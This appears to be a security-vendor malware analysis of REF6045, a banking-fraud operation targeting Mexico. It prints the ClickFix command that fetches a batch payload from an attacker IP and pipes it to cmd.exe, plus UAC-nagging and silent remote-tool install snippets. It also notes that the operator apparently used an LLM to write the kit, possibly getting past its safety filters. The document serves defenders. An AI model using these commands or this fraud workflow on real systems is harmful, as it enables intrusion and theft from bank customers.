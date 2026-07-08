A Mexican banking fraud operation we're tracking as REF6045 doesn't run on autopilot. A human operator is behind the wheel, monitoring infected machines and deciding what happens next. Victims are infected through fake CAPTCHA pages that trick them into running a single command, which installs SCMBANKER, a PowerShell toolkit with components dating back to at least October 2025. Once installed, the operator can see when a victim opens a banking session, lock the screen behind a fake bank warning, push the victims towards live phone interaction, redirect the browser, or replace account numbers copied to the clipboard. For a full takeover, they can also deploy a commercial remote-access tool.
Key takeaways
- REF6045 adapts ClickFix delivery into operator-assisted banking fraud, using fake verification pages to stage a PowerShell toolkit (we’re calling SCMBANKER) on victim machines
- SCMBANKER gives operators a full fraud workflow: banking-session monitoring, screenshot capture, vishing overlays, phishing redirects, clipboard manipulation, and Remote Utilities installation
- SCMBANKER heavily targets Mexico’s financial ecosystem, including retail banks, business banking portals, fintechs, payment processors, cryptocurrency exchanges, investment platforms, SAT, and telecom services
- Operator OPSEC failures, including open directories, a leaked web-root archive, and an unauthenticated file editor, expose the operation’s tooling and targeting logic
- The scripts are riddled with AI-generated artifacts, indicating that the operator used an LLM to write most of the tooling
How Elastic Security Labs discovered REF6045
On June 18, 2026, Elastic telemetry surfaced a host using bitsadmin to download a batch of suspicious PowerShell scripts from an open directory at
http://68.211.161[.]46/files/. The open directory allowed us to retrieve the individual agent scripts directly, and from the same server, we recovered an archive,
zkt.zip, containing the operation's full web root before it was removed.
At the web root of
http://68.211.161[.]46/, we found a ClickFix fake-CAPTCHA flow that presented itself as a security verification page. The page first asked the visitor to complete an image challenge, including a Spanish prompt to select fire hydrants, before moving into the familiar Windows Run verification instructions. The command fetches
validation.txt from the same web server and pipes it directly into
cmd.exe, using the lure text “Google Verificación Segura (Version 2025.5755)”. The page also sends a POST request to a tracking endpoint at
https://ww.ssinvestigaciones[.]com/login3.php.
Because
navigator.clipboard.writeText() requires a secure, focused browser context to copy the malicious command to the victim's clipboard, the original IP (
http://68.211.161[.]46/) was unlikely to be the only victim-facing delivery path. We identified multiple HTTPS ClickFix hosts that reused the same command pattern and pointed victims back to the exposed file servers for
validation.txt.
The observed ClickFix and file-server variants are included in the following table. The C2 values were extracted from the PowerShell scripts hosted under each
/files open directory.
|ClickFix host
|ClickFix validation.txt file source
|File host (hosting toolkit)
|C2 extracted from hosted PS1 scripts
https://ratonvaquero2026[.]online/
http://68.211.161[.]46/validation.txt
https://ratonvaquero2026[.]online/files/
https://negratomasa2026[.]online/dashboard2/recData.php
https://monteviral2026.duckdns[.]org/
http://68.211.161[.]46/validation.txt
https://monteviral2026.duckdns[.]org/files/
https://gestionmontelavaria2026[.]online/dashboard2/recData.php
https://osogransd[.]online/
http://216.250.112[.]100/validation.txt
https://osogransd[.]online/files/
http://185.242.246[.]169/dashboard2/recData.php
SCMBANKER's execution chain
The initial infection chain described below uses the
monteviral2026.duckdns[.]org ClickFix page as an example, but the observed variants follow the same pattern: they present a CAPTCHA-style verification page, including an image challenge, before copying a command to the clipboard and instructing the victim to run it from the Windows Run dialog.
Below is an example command line:
cmd /c curl -k http://68.211.161[.]46/validation.txt | cmd.exe & exit # CIoudfIare Google Verificación Segura (Version 2025.5755)
Decoy strings "CIoudfIare" with capital-I homoglyphs, and the "Google Verificación Segura" version text are reproduced verbatim.
Despite the
.txt extension, it is a Windows batch script that prepares the host and sets up the full toolkit in six different stages.
Fake update smokescreen
The batch script immediately launches Microsoft Edge in kiosk mode pointing to
fakeupdate[.]net, a well-known pentesting/red team site that renders a fake Windows Update screen. This distraction buys time for the script to fully execute.
start msedge.exe --kiosk https://fakeupdate[.]net/win10ue --edge-kiosk-type=fullscreen
UAC consent fatigue loop
Next, the malware checks if it is running as admin via
net session. If it is not elevated, it shows a social-engineered message "Windows: Se requieren permisos de administrador para actualizar su sistema..." (Administrator permissions are required to update your system…), and relaunches itself with
-Verb RunAs every 20 seconds, frustrating and forcing the victim to click “Yes” on the UAC consent prompt.
:check
net session >nul 2>&1
if %errorlevel%==0 goto admin
echo Windows: Se requieren permisos de administrador para actualizar su sistema...
powershell -Command "Start-Process '%~f0' -Verb RunAs"
timeout /t 20 >nul
goto check
Cursor trap
Once elevated, an inline PowerShell P/Invoke call to
user32.dll!ClipCursor confines the mouse to a single 1x1 pixel rectangle at the screen center, locking any mouse movement. This is paired with the fake Windows Update screen to encourage the victim to stay idle, giving time for the malware to download the full toolset in the background without interruption.
Downloading the SCMBANKER toolkit via bitsadmin
All malicious scripts, files, and binaries are pulled individually via
bitsadmin from
http://68.211.161[.]46/files/ to
C:\Users\Public\.
SCMBANKER's persistence: registry Run key and startup folder
Two persistence mechanisms launched by
C:\Users\Public\run.vbs on logon, plus a one-shot infection marker:
- Run key:
HKCU\...\Run, value
"run", runs hidden PowerShell launching
run.vbs.
- Startup folder:
run.vbsdropped to three path variants (
%APPDATA%,
%USERPROFILE%\AppData\Roaming, and the legacy XP
%USERPROFILE%\Start Menu).
- RunOnce timestamp: value
"id"writes
%date% %time%to
C:\Users\Public\id.txtonce on next logon, then self-deletes.
Forcing a reboot to trigger persistence
The script sends an F11 keypress to exit fullscreen, followed by a Ctrl+W keypress sequence to close the fake Windows Update tab. However, this approach only works in a standard fullscreen browser window, not in kiosk mode. It then forces a reboot with the
shutdown /r /t 02 command and switches. Upon restart, the previous persistence mechanism via the Registry Run key triggers execution of the VBScript file (
run.vbs).
The SCMBANKER toolkit
run.vbs: SCMBANKER's master launcher
The VBScript (
run.vbs) is the master launcher. It uses
WScript.Shell.Run with a hidden window style and
Invoke-Expression to start the toolkit's modules in parallel:
run.vbs launches the following modules:
|Script
|Role
rotor2.ps1
|Long-running process-mutation rotator for
mensaje1.ps1 (vishing module)
ini.ps1
|Delayed launcher for
jujuzkt.ps1 (banking activity monitor)
remo.ps1
|IP-gated launcher for
jujuzkt2.ps1 (phishing redirect module)
edifhjwe.ps1
|Toolkit updater
cliente.ps1
|C2 beacon / implant control channel
avs.ps1
|Remote Utilities RAT installer downloader
clip.ps1 /
clip2.ps1
|CLABE and card-number clipboard hijackers
correr.ps1
|Arbitrary PowerShell executor
cursor2.exe
|Invisible-cursor utility (compiled AutoIt). Replaces every system cursor type with an invisible cursor at
C:\Users\Public\invi.cur
Pivoting in VirusTotal, we discovered earlier versions of the toolkit components, suggesting the tooling has been in use since at least October 2025 and has been iterated on for several months.
C2 beacon and victim management
Every 30 seconds,
cliente.ps1 collects a machine profile and performs an HTTP POST request to
https://negratomasa2026[.]online/dashboard2/recData.php:
The following tables represent this request data and their associated fields:
|Field
|Source
|Purpose
machine_name
$env:COMPUTERNAME
|Victim identification
client_id
GUID in
client_id.txt
|Unique implant ID (persists across reboots)
ip_local
Get-NetIPAddress
|Internal network recon
ip_public
api.ipify.org
|External IP for geolocation and targeting
comentario
comentario.txt
|Operator's notes/label for this victim
idInternet
id.txt
|Infection timestamp
remoto
agent.txt
|RAT installation status (default:
SIN REMOTO AUN)
comando
comando.txt
|Last command received
optUpdate
|hardcoded “update”
|Meant to flag whether the remote tool is installed, but it's overridden to always say
"update" (likely debugging leftover)
timestamp
|Unix epoch
|Beacon time
The C2 response contains two operator-controlled fields.
The data from the
comentario field is saved to
comentario.txt and stores the operator’s label or notes for the victim.
The data from the
comando field is saved to
comando.txt. Other modules poll that file for operator instructions:
avs.ps1handles MSI URLs,
edifhjwe.ps1handles ZIP update packages
correr.ps1handles PowerShell-prefixed execution requests.
The following image shows the server response parsing logic.
Banking activity monitor
The primary banking activity monitor is a PowerShell script (
jujuzkt.ps1), but it also has optional active branches:
- URL injection when a configured target has a redirect URL, and
- a commented-out keylogger rotator path via
rotor.ps1.
After a short startup delay, invoked by
ini.ps1, the banking monitor script refreshes three configuration files every five minutes.
|Remote URL
|Local File
|Content
https://negratomasa2026[.]online/a/teleavisos.txt
config1.txt
|Arbitrary PowerShell executed via
Invoke-Expression
https://negratomasa2026[.]online/b/listadebancos.txt
config2.txt
|Window title keywords (bank names + optional redirection target,
*-delimited)
https://negratomasa2026[.]online/b/keysnegativas.txt
config_negative.txt
|Negative keywords to filter out false matches when scanning opened windows
Once running, the banking activity monitor checks all visible window titles every second. A match (full list here) against any listed bank, fintech, payment processor, crypto exchange, brokerage, SAT, or telecom keywords causes the implant to POST an alert to
https://negratomasa2026[.]online/dashboard2/avisos2.php in the following format:
mensaje = "<window title>
Detected C0incidence: '<keyword>'
Version: V.1.0.1
10:03 p. m. 08/12/2025
Nombre de PC: <hostname>
Cliente desde: <id>
Client ID: <clientId>
IP: <public_ip>
Navegador: <process_name>
<current timestamp>"
clientId = <clientId>
A banking match also starts the screenshot workflow through the toolkit’s rotator pattern. The
rotor scripts act as short-lived wrappers: they copy a target script into
%TEMP% under Windows-like process names, execute the copy, and repeat for a set period. In this case,
rotor1.ps1 repeatedly spawns
screen2.ps1 every 7 seconds for 5 minutes, producing about 42 screenshots per trigger. Each
screen2.ps1 run captures the full virtual desktop, compresses the image under 10 MB, and uploads it to
https://negratomasa2026[.]online/dashboard2/imagenes.php.
SCMBANKER's keylogging module
jujuzkt.ps1 also contains a commented-out path to launch
rotor.ps1, a short-lived rotator for
key.ps1. While the banking monitor path launches
rotor1.ps1 for screenshots, the presence of
rotor.ps1 and
key.ps1 shows an additional keylogging capability in the toolkit.
rotor.ps1 applies the same rotator pattern to
C:\Users\Public\key.ps1.
This PowerShell script (
key.ps1) fetches Telegram bot credentials from
https://negratomasa2026[.]online/a/telekeylogger.txt via
Invoke-Expression, but never references them after assignment. The only exfiltration path in the script is an HTTP POST to
https://negratomasa2026[.]online/dashboard2/logs.php with the client ID and hostname. The Telegram configuration may be leftover code from an earlier version.
The vishing engine: turning infections into live phone scams
The vishing engine is what turns a commodity-looking PowerShell bundle into an operator-assisted fraud workflow.
rotor2.ps1 applies the rotator pattern to
mensaje1.ps1, keeping the dispatcher alive under changing Windows-like filenames.
When
mensaje1.ps1 is launched, every 10 seconds it fetches
https://negratomasa2026[.]online/b/<redacted>.txt, where each line has the format
<IP>*<URL>, mapping a victim public IP address to a vishing page URL. If the victim’s public IP appears in that list, the dispatcher launches a vishing lock-screen module and records the child process ID so it can later release the victim when the IP is removed.
The operator can choose between two overlay behaviors.
mensaje.ps1creates a borderless, topmost WebBrowser window, confines the mouse to the form, and uses a
200ms timer to bring the overlay back to the foreground if the victim clicks away.
mensajeoff.ps1uses a more normal-looking window that cannot be closed and automatically undoes every attempt to dismiss, move, resize, or minimize it. Triggered when the URL in
ipsabloquearconiframe.txtends with
?off.
The content of those pages completes the social engineering loop: the victim sees a fake bank warning and is prompted to call an operator. One observed page,
http://68.211.161[.]46/driver.html?off, links to a Remote Utilities payload, connecting the vishing prompt directly to hands-on access.
Active browser redirects to phishing pages
Unlike the banking monitor, the redirect module only engages victims the operator has explicitly queued for phishing.
remo.ps1 polls
https://negratomasa2026[.]online/b/<redacted>.txt every 5 minutes, and only victims whose public IP appears in that file launch the second monitor,
jujuzkt2.ps1.
jujuzkt2.ps1 watches window titles against
https://negratomasa2026[.]online/b/urlsscams.txt (archived list here) and, when a configured URL exists, places the phishing URL on the clipboard, focuses the browser, sends keypresses (Ctrl+L, Ctrl+V, and Enter), then pauses before continuing.
Many
urlsscams.txt entries currently end with an empty URL, which suggests target coverage was planned ahead of the completed vishing pages.
An observed redirect destination,
https://bancaporinternetbbmx[.]online, also includes a page-load Telegram notification script. When the phishing page opens, the script forces IPv4 resolution, collects browser and device details, and sends the profile to a Telegram chat. This gives the operator immediate confirmation that a redirected victim has reached the lure and has enough context to prioritize live follow-up.
Clipboard and transfer manipulation
The clipboard modules focus on payment redirection rather than credential theft.
clip.ps1checks the clipboard every 300 milliseconds for 18-digit CLABE account numbers, then matches the first three digits against the Mexican bank prefix and can replace the destination account with an attacker-controlled CLABE from
https://negratomasa2026[.]online/b/clabes.txt
clip2.ps1applies the same process to 16-digit card numbers, matches on the six-digit bank identification numbers, and replaces them with values from
https://negratomasa2026[.]online/b/tarjetas.txt
How does the operator get hands-on access to a victim's machine?
SCMBANKER gives the operator direct, hands-on-keyboard control by installing a remote-access tool. Rather than build one, REF6045 repurposes Remote Utilities Host, a legitimate commercial remote-administration product, and configures it silently to call back.
Deployment is operator-triggered and runs through three scripts. The first script (
avs.ps1) polls
comando.txt every 120 seconds, and when the operator pushes an
.msi URL it downloads the installer to
C:\Users\Public\ and launches
instaler.ps1. This second script (
instaler.ps1) exits if the
99.kut guard file already exists so the RAT installs only once, relaunches itself with
-Verb RunAs until it gets admin, then installs silently with
msiexec /i "hosts.msi" /quiet /norestart. On success, it writes
REMOTO INSTALADO to
agent.txt, drops the
99.kut guard, and runs
attrib +h +s "C:\Users\Public" to hide the implant directory.
The third script(
remoto.ps1) waits 120 seconds, then imports a registry blob into
HKLM\SOFTWARE\Usoris\Remote Utilities Host\Host\Parameters that sets callback auto-connect to the operator (default port 5650, Spanish UI, notifications suppressed, a hardcoded auth key, and SID
46053.045416157).
It also deletes the
UninstallString at
HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F6688BD5-2126-4F4F-A484-1D05781479B9} so the victim cannot remove it through the traditional Windows menu: Add/Remove Programs.
The result is a persistent, attacker-configured remote desktop that calls home on its own, runs without tray notifications, and resists removal. It is the same payload as the
driver.html?off vishing page points victims to, so the social-engineering prompt and the silent install converge on the same hands-on access.
SCMBANKER's self-update mechanism
SCMBANKER includes a self-update mechanism that lets the operator replace the implant from the C2 without rebuilding persistence.
edifhjwe.ps1 polls
C:\Users\Public\comando.txt (C2 command written by
cliente.ps1) every 40 seconds and treats a ZIP URL as an update instruction.
When triggered,
edifhjwe.ps1 downloads the ZIP to
%TEMP%\Agent_temp.zip, wipes most of
C:\Users\Public\, and extracts the new toolkit into place. It preserves a small set of state files, including
comando.txt,
comentario.txt,
id.txt,
agent.txt, and
99.kut, so the updated bot keeps its operator notes, infection timestamp, remote-access status, and Remote Utilities install marker.
After extraction, the updater writes
BOT ACTUALIZADO to
comando.txt as a completion flag, kills running PowerShell module processes by script name, and relaunches
run.vbs.
Is the REF6045 malware written by AI?
The scripts show strong signs of AI assistance, most likely by prompting a large language model in Spanish and then applying manual obfuscation afterward. The code has a split personality, with clean, descriptive function names and heavy explanatory comments sitting next to hand-shortened variables and leftover generation artifacts. The placement of instruction-like comments directly above the code they describe suggests the authors have prompted an inline coding assistant such as Copilot or Cursor.
The clearest artifact is a comment sitting directly in the mutation rotator and the keylogger (
rotor2.ps1 and
key.ps1), which are saturated with aggressive profanity in their comments, while the rest of the kit uses a neutral tone:
key.ps1 has a self-documenting obfuscation; Base64-encodes its Win32 API names to hide them from scanners, then immediately annotates what each one decodes to:
$u32b64 = 'dXNlcjMyLmRsbA==' # user32.dll
$GASb64 = 'R2V0QXN5bmNLZXlTdGF0ZQ==' # GetAsyncKeyState
$GKLb64 = 'R2V0S2V5Ym9hcmRMYXlvdXQ=' # GetKeyboardLayout
$TUExb64 = 'VG9Vbmljb2RlRXg=' # ToUnicodeEx
Every script opens with heavy banner-comment dividers (
INTERVALOS DE TIEMPO,
DICCIONARIOS Y VARIABLES,
FUNCIONES,
INICIO,
LOOP PRINCIPAL). This document-like scaffolding is a hallmark of LLM-generated PowerShell and is rarely seen in scripts by experienced developers.
Taken together, the evidence points to an operator who prompted a model in Spanish, used profanity and phrasing tricks either out of frustration or to bypass safety filters for the more sensitive components, and pasted the outputs with little review before applying a light manual obfuscation pass. The kit was not generated autonomously, but the model did the heavy lifting on essentially every functional script.
As language models become increasingly capable, defenders should expect AI-assisted malware development to become more common, particularly among operators who previously lacked the expertise to implement these capabilities themselves.
REF6045's infrastructure and OPSEC failures
The depth of this analysis was made possible by poor server hygiene across the operation. The file server at
http://68.211.161[.]46/files/ had directory listing enabled, exposing the PowerShell agent scripts for direct download. The same directory also briefly hosted
zkt.zip, which yielded the entire operation in a single archive.
The C2 also exposed an unauthenticated file editor at
/b/editor.php, allowing anyone to directly modify the operation's live targeting configuration files without credentials. The same surface that lets the operator manage victims also lets a visitor read and write the configuration files.
The related hosts listed in Discovery reused the same
validation.txt delivery pattern while hosting overlapping PowerShell toolsets under
/files. Those hosted scripts pointed to separate C2 panels, but the panels shared the same SCM-branded login template, with the latest we’ve seen being SCM v2.0, hence the name SCMBANKER.
Taken together, the open directories, exposed editor, repeated lure text, overlapping file-server contents, and shared SCM panel branding suggest kit reuse or multiple deployments by the same operator set. We treat the related hosts as infrastructure variants around the same tooling rather than as separate malware families.
Why REF6045 matters despite its crude execution
REF6045 is not a sophisticated operation. The tooling is crude and held together with copy-paste batch files, duplicated bitsadmin jobs, sloppy persistence, self-defeating obfuscation that ships its own key, and a server left wide open with directory listings, a full web-root archive, and an unauthenticated editing panel.
That lack of craftsmanship is partly explained by how the kit was developed. The scripts are littered with numerous AI-generated artifacts, suggesting the operator relied heavily on a large language model to implement much of the functionality. Rather than writing components such as the keylogger or a clipboard hijacker from scratch, the operator prompted a model, pasted the output, and applied a light manual obfuscation pass on top.
Victims are kept as a passive feed while the operator watches a live dashboard and engages only the targets worth the effort, switching on browser redirects, vishing lockdowns, clipboard swaps, or a full RAT by IP, on demand. Crude as it is, SCMBANKER already has real victims. The live victim counter and the labeled, tagged machines on the operator's own panels show that individual people are being actively targeted.
REF6045 through MITRE ATT&CK
Elastic uses the MITRE ATT&CK framework to document common tactics, techniques, and procedures that threats use against enterprise networks.
Tactics
Tactics represent the why of a technique or sub-technique. It is the adversary’s tactical goal: the reason for performing an action.
- Initial Access
- Execution
- Persistence
- Privilege Escalation
- Stealth
- Credential Access
- Discovery
- Collection
- Command and Control
- Exfiltration
- Impact
Techniques
Techniques represent how an adversary achieves a tactical goal by performing an action.
- Phishing: Spearphishing Link
- User Execution: Malicious Link
- Command and Scripting Interpreter: Windows Command Shell
- Command and Scripting Interpreter: PowerShell
- Ingress Tool Transfer
- BITS Jobs
- Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
- Masquerading: Match Legitimate Name or Location
- Hide Artifacts: Hidden Files and Directories
- Modify Registry
- System Information Discovery
- System Network Configuration Discovery
- Application Window Discovery
- Input Capture: Keylogging
- Screen Capture
- Clipboard Data
- Remote Access Software
- Application Layer Protocol: Web Protocols
- Web Service
- Exfiltration Over C2 Channel
- System Shutdown/Reboot
- Financial Theft
How to detect and prevent REF6045
Prevention rules for detecting SCMBANKER
- Suspicious PowerShell Execution via Windows Scripts
- DNS Query to Suspicious Top Level Domain
- Suspicious Bitsadmin Activity
- Suspicious Windows Script Interpreter Child Process
- Execution from Unusual Directory
- External IP Address Discovery via a Trusted Program
- Suspicious String Value Written to Registry Run Key
- Suspicious Command Execution via Windows Run
- Curl HTTP Fetch Piped to Cmd or Node via Command Shell
Observations
The following observables were discussed in this research.
|Observable
|Type
|Name
|Reference
68.211.161[.]46
|ipv4
|ClickFix / file host
216.250.112[.]100
|ipv4
|ClickFix / file host
185.242.246[.]169
|ipv4
|REF6045 C2
ratonvaquero2026[.]online
|domain-name
|ClickFix / file host
monteviral2026.duckdns[.]org
|domain-name
|ClickFix / file host
osogransd[.]online
|domain-name
|ClickFix / file host
negratomasa2026[.]online
|domain-name
|REF6045 C2
gestionmontelavaria2026[.]online
|domain-name
|REF6045 C2
ssinvestigaciones[.]com
|domain-name
|ClickFix post-CAPTCHA tracking endpoint
bancaporinternetbbmx[.]online
|domain-name
|BanBajio phishing page
b30cb0aa977aacdab94d2ef503186c8f0b2fc10d7cf0d7c7c0ada70c127dc7e8
|SHA-256
zkt.zip
|Exposed web-root archive
554f1aefeb698995501751328c2f9fe93f02a680679fba3dd15f1ed93d46bf1b
|SHA-256
validation.txt
|First-stage batch payload
ff3555154e91e42490cc722b6c7f3c4c91654b7ef53a35d0719ffb89accf1b27
|SHA-256
run.vbs
|Master launcher
526287a40aad1b218228cdd1f459ad3b93f858585048347644d597c6ab19515a
|SHA-256
cliente.ps1
|C2 beacon
685d29ce8a550feb3a9e1d1c5926ec5e927615cf34aab62c108a812a1eb6737c
|SHA-256
jujuzkt.ps1
|Banking activity monitor
8c87ea94401fa97d3743a87604e088d1a29c7b06cf9673623941a42da68452a6
|SHA-256
jujuzkt2.ps1
|Active browser redirect module
6dcd7fdd5e088d98d861cbd1cb74a7b83ae5508f4dbb617413bcbe7fbc8a82e2
|SHA-256
mensaje1.ps1
|Vishing dispatcher
4d9c160ebb44507b11f0e6421f691900284f25b5530a23d9fd50de0ae01663ca
|SHA-256
mensaje.ps1
|Hard-lock vishing overlay
0315d4a7bc14654ad66d4c2b98920b92ca18cbc231b3ce5fba1fcac70b828e19
|SHA-256
mensajeoff.ps1
|Soft-lock vishing overlay
5d17645548a44fe39d3cc816ffa3933321c1eb8b08a8f4348e3cd82f25112c81
|SHA-256
rotor1.ps1
|Screenshot module invoker
566f4bfdfea54129b8528d50cae187a9030e2f2787749add4b0db22ac35ea581
|SHA-256
screen2.ps1
|Screenshot module
882d582e85d5bb7abbdde791a2d52e3b1bb7dd7f79c20318ce64b74249221fdb
|SHA-256
rotor2.ps1
|Vishing dispatcher rotator
eea08fbf3720d638af1d313d3ce369708b77d7891379d5c5871dd7f36667ed0c
|SHA-256
clip.ps1
|CLABE clipboard hijacker
70140aa236d630a7d5ed08be3dafcccea9a8b0eec6dadf8c1cf1b96d8f608609
|SHA-256
clip2.ps1
|Card-number clipboard hijacker
6c8ba7127a83431432e85946976c18bb3f3e9bf9def68aae572cd1d9d73604c7
|SHA-256
avs.ps1
|Remote Utilities downloader
81a4512db985359ed361755da58a1177b07632b5aee951c68a6ace54f4d0534b
|SHA-256
instaler.ps1
|Remote Utilities installer launcher
3d9015429d65276869ceb9c91f10d6474b1098042db75949c49b9f1682c1f3ae
|SHA-256
remoto.ps1
|Remote Utilities configurator
5bc85b604eb37ffa1e67c57f4744b55ef876a1ab442e2a2440550ef0922aeec7
|SHA-256
correr.ps1
|Arbitrary PowerShell executor
30ff24faad80184bb43660a8bd317df99a8d09d31bae3b446aaa876543f2620f
|SHA-256
key.ps1
|Telegram-backed keylogger
4b7b35b921d7615b7a82a42c379560d1b0c5a74c81311a269874195ba2744f2d
|SHA-256
cursor2.exe
|Invisible-cursor utility
32d981b3e7c36aa7030cfd9ee412bff742e00b36c39c80634b2681f89de4a487
|SHA-256
hosts.msi
|Remote Utilities installer
cd7b179dd98848a02b9a1d4ebfeee26cdbb317b4ad53eb50786e18515b0cf804
|SHA-256
ini.ps1
|Delayed launcher
345e8a90b7b762b065333cd068811d88086d157be713d89bdf200c927645f3d8
|SHA-256
remo.ps1
|IP-gated launcher
0ec9b518f84b6bdc0e843b89fa755522ec67db862414ad16bdcaa8c2be25485c
|SHA-256
edifhjwe.ps1
|Self-updater
26f906a2a4276b1968a8ce956a7b342aa9bc26f60d32c14668223877f569fb3f
|SHA-256
rotor.ps1
|Keylogger rotator
13bfd0f695cea1d6ae570a7ca056ffe930467be73a26f29f95209618f383bd2d
|SHA-256
4.bat
|Early version of run.vbs